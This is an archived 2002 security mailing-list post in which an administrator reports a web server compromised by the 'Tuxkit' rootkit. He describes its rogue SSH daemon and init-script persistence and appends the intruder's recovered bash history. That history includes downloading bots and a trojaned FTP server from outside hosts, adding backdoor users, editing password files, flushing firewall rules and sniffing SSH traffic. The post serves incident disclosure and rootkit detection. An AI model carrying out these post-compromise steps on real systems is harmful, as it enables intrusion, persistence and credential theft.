Tuxkit (Optic Kit?) -cracked (/dev/tux)

From: Mark Newby (markat_private)
Date: Thu May 02 2002 - 03:54:25 PDT

  • Next message: William N. Zanatta: "Re: A friend's cable modem Linux machine just got compromised"

    A client's web server (Red Hat Linux 7.2) got cracked into v recently.
    
    I have re-created a mini filesystem of all the files the
    rootkit/crackers modified/installed on another system.  the main culprit
    was the dir /dev/tux, modified binaries installed, password-less users
    added, tools downloaded, network sniffed, etc, etc.
    
    one of the interesting things it does is install a rogue SSH2 server in
    /usr/bin/ssh2d that runs on a high numbered port and modifies
    /etc/rc.d/init.d/network to start it whenever the network service goes
    up.  it also modifies /etc/rc.d/rc.sysinit to start /usr/bin/xsf and
    /usr/bin/xchk, which it installs.
    
    $ cat /dev/tux/ssh2/logo
    ________          __  .__          ____  __.__  __
    \_____  \ _______/  |_|__| ____   |    |/ _|__|/  |_
       /   |   \\____ \   __\  |/ ___\  |      < |  \   __\
    /    |    \  |_> >  | |  \  \___  |    |  \|  ||  |
    \_______  /   __/|__| |__|\___  > |____|__ \__||__|
              \/|__|                \/          \/
    
                   Only For Da T.R.U O.C's
    
    ---------- end of cat command o/p ----------
    
    ...anything to do w/ Mark Adene (aka `Phiber Optic'), I wonder?
    
    The files installed by the rootkit/crackers match a very detailed review
    of a rootkit called "Tuxkit" at the URL
    <http://www.hackinthebox.org/article.php?sid=5724>, also available at
    the URL <http://mel.ini2.net/p/tuxkit-analysis.txt> (which even advises
    on how to improve it).
    
    At least one of the crackers who got in didn't know how to turn off his
    command history recording mechanism in bash, so I have a log of some of
    the commands during two of his logins (see footer of this e-mail).
    
    This is the first time posting to this site.  pls advise if this e-mail
    could be improved upon.
    
    I've written to Nelson, an author of chkrootkit to offer any data/files
    so as this rootkit can be added for checking.  If anyone else would like
    any of the files, just ask.
    
    
    mark (command history of cracker follows)
    
    ------------------------------------
    export DISPLAY=c4zz1mb0cch10
    telnet localhost
    lynx
    cd /var/www
    ls
    cd html
    ls
    cd /var/spool
    ls -la
    cd wu-ftpd-trojan
    ls
    make install
    make
    cd ..
    ls
    rm -rf wu-ftpd-trojan
    ls -la
    rm .wu.tar.gz
    ls
    cd samba
    mkdir .tmp
    cd .tmp
    ls -la
    wget ftp://ftp.eggheads.org/pub/eggdrop/source/1.6/eggdrop1.6.10.tar.gz
    ls -la
    export DISPLAY=c4zz1mb0cch10
    telnet localhost
    ls
    ipchains
    /sbin/ipchains
    /sbin/ipchains -L
    /sbin/iptables --help
    /sbin/iptables --L
    /sbin/iptables -L
    /sbin/iptables -F
    /sbin/ifconfig
    netstat -na
    cd /var/log
    ls -la
    cat xferlog
    cd /lib/security/.config
    ls
    ls -la
    cat .logs
    ./lpsched
    cd ssh
    ls
    cd ..
    dmesg |more
    cd /home
    ls
    cd amartin
    ls -la
    cd ..
    cd scripts
    ls -la
    cd ..
    tspreckley
    cd tspreckley
    ls
    cd ..
    mhill
    ls
    cd mhill
    ls -la
    cd ..
    ls -la
    cd mnewby
    ls -la
    cd ..
    ls -la
    cd nhoskins
    ls -la
    cd ..
    ls -la
    cd ..
    ls -la
    cd /root
    ls -la
    cat .saves-2169-www.kenmare.co.uk~
    cat rootat_private
    2
    ;:
    export DISPLAY=c4zz1mb0cch10
    telnet localhost
    ssh -p 15000 localhost
    /sbin/ifconfig
    ftp 62.98.168.235
    ls -la
    export DISPLAY=c4zz1mb0cch10
    telnet localhost
    ls -la
    /sbin/route
    /sbin/ifconfig
    host keeper-dmz.kenmare.co.uk
    nmap
    telnet 192.168.66.111 21
    
    route
    /sbin/route
    ping keeper-dmz.kenmare.co.uk
    host gw
    /sbin/route
    host dmz
    cat /etc/hosts
    ps aux
    kill -9 14576
    finger
    cd /home
    ls
    adduser tmp
    /bin/adduser
    /sbin/adduser
    /usr/sbin/adduser
    /usr/sbin/adduser tmp
    passwd tmp
    cat /etc/passwd
    ls
    exit
    export DISPLAY=c4zz1mb0cch10
    telnet locahost
    ls -la
    telnet localhost
    exit
    ls
    lynx www.google.it
    wget linux.minerva-is.cz/.tmp/.eg.tar.gz
    mv .eg.tar.gz /var/spool
    ls -la
    cd lib
    ls
    mkdir .tmp
    cd .tmp
    mv /var/spool/.eg.tar.gz .eg.tar.gz
    tar xvzf .eg.tar.gz
    cd eggdrop1.6.10
    cd ..
    rm -rf .eg.tar.gz
    rm -rf eggdrop1.6.10/
    wget http://www.eggdrops.de/download/eggdrop1.6.1+IPv6+precompiled.tar.gz
    tar xvzf eggdrop1.6.1+IPv6+precompiled.tar.gz
    eg *.tar.gz
    mv eggdrop1.6.1+IPv6_by_Akke/ .eg
    rm eggdrop1.6.1+IPv6+precompiled.tar.gz
    cd .eg
    ls
    rm eggdrop
    ls
    mv eggdrop-1.6.1 v0m3r0
    rm *.conf
    vi nnc
    ./v0m3r0 nnc -m
    telnet localhost 3333
    cd ..
    ls
    ls -la
    ps aux
    deluser tmp
    rmuser
    cd /home
    ls
    rm -rf tmp
    vi /etc/passwd
    vi /etc/passwd-
    vi /etc/shadow
    iptables -L
    /sbin/iptables -L
    exit
    ls -la
    cd /var/spool
    ls -la
    cd /lib
    ls -la
    cd .tmp
    ls -la
    cd .eg
    ls -la
    netstat -na
    
    
    exit
    export DISPLAY=c4zz1mb0cch10
    telnet localhost
    adduser cos
    /usr/bin/adduser
    /usr/sbin/adduser
    /usr/sbin/adduser cos
    passwd cos
    exit
    ifconfig
    /sbin/ifconfig
    cd /lib/security/.config
    ls -la
    find / -name tcp.log
    lynx
    ls
    wget
    ftp 62.98.245.54
    export DISPLAY=c4zz1mb0cch10
    telnet localhost
    lynx
    tar xvzf sniffit.0.3.5.tar.gz
    finger
    cd sniffit.0.3.5
    ls -la
    ./configure
    make
    ls -la
    cd ..
    mv sniffit.0.3.5 /var/spool/.tmp
    rm sniffit.0.3.5.tar.gz
    cd /var/spool/.tmp
    ls
    cd .tmp
    ls -la
    cd ..
    ls -la
    cd .tmp
    ls -la
    ./sniffit
    ./sniffit -P tcp -p 22
    /sbin/ifconfig
    ./sniffit -P tcp -p 22 -s 192.168.66.1
    ./sniffit -P tcp -p 22 -s 192.168.66.1  -L 10
    vi README.FIRST
    ./sniffit -P tcp -p 22,21 -s 192.168.66.1  -L 1 -F eth0
    ./sniffit -P tcp -p 22 -s 192.168.66.1  -L 1 -F eth0
    ./sniffit -P tcp -p 22 -s 192.168.66.1  -L 1
    ./sniffit -P tcp -p 22 -L 1 -s 192.168.66.1
    ./sniffit -P tcp -p 22 -s 192.168.66.1
    mv sniffit v0m3r0
    ls
    vi sample_config_file
    cd ..
    cd .tmp
    rm -rf *
    lynx
    gcc -o v0m3r0 linsniffer.c
    ls -la
    cd /home
    rm -rf cos
    exit
    -------------------------------------------
    
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Thu May 02 2002 - 08:21:56 PDT